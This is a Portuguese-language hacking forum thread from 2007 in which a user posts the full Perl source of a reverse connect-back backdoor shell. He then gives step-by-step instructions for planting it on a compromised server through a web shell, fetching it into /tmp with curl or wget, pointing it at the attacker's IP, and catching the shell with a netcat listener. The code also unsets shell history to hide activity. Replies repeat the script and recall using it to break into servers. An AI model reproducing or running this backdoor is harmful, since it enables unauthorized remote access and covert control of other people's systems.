Upar executar e conectar com a backdoor.

Started by oniarce, 27 de December , 2007, 08:55:20 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

oniarce


Aqui esta o código fonte da Backdoor
FASE 1:
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[li] Resolving HostName
#[li] Connecting... 127.0.0.1
#[li] Spawning Shell
#[li] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system   = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[li] Resolving HostName\n";
print "[li] Connecting... $ARGV[0] \n";
print "[li] Spawning Shell \n";
print "[li] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF????? ??????


Abra o bloco de noas e salve como back.pl, ospede em algum site.
FASE 2:
Depois de ter acesso a shell de algum faser os passos abaixo.
Geralmente as shells executam os comandos la onde esta escrito "Go dir".
Va no "Go dir" digite /tmp e precione ENTER.
(/tmp são os arquivos temporarios, geralmente você tem acesso rot lá)
Depois escreva:
curl www.site-com-a-backdoor/back.pl
enves de curl você pode usar wget, lynx. Pronto a backdoor esta upada.
FASE 3:
Agora vamos compilar o backdoor na shaell.
perl back.pl xxx.xxx.xxx.xxx yyyy
onde:
xxx.xxx.xxx.xxx é seu IP
yyyy é a porta que você escolher.
FASE 4:
Agora vamos nos conectar ao backdoor.
Você presisa ter o Nacat.
Entre em Iniciar - Executar, e digite cmd.
Digite:
nc -vv -l -p yyyy

Observação:
Se  não conectar, tente executar a backdoor novamente, como nc escutando a porta.


Qualquer erro me avisem.

branco

hmm essa tecnica se trata de conexão reversa né, o servidor se conecta ao seu netcat.
interessante, é bom lembrar que para o backdoor se conectar ao nosso computador, o netcat já deve estar em escuta.

espero que o código esteja funcionando direitim ^^

até, vlws
Olha o trem... Quem vai ficar, quem vai partir? Quem vai chorar, quem vai sorrir?

oniarce


rmoraes

Amigo so comferindo o exploit e este mesmo correto?

Quote#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[li] Resolving HostName
#[li] Connecting... 127.0.0.1
#[li] Spawning Shell
#[li] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system   = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[li] Resolving HostName\n";
print "[li] Connecting... $ARGV[0] \n";
print "[li] Spawning Shell \n";
print "[li] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF????? ??????

oniarce

Sim este mesmo.
Qualquer coisa me add no MSN que eu te passo ele correto.
mailto:oniarce@hotmail.com">oniarce@hotmail.com

Wuefez

asuhasuhasuhsa

num acredito que essa porra ainda existe... primeira vez que vi esse script foi em 2004...... eu usava ele pra caramba na epoca do bug do awstats, nossa que nostalgia, como era facil fazer shell naquela epoca....


"Quem fala não faz."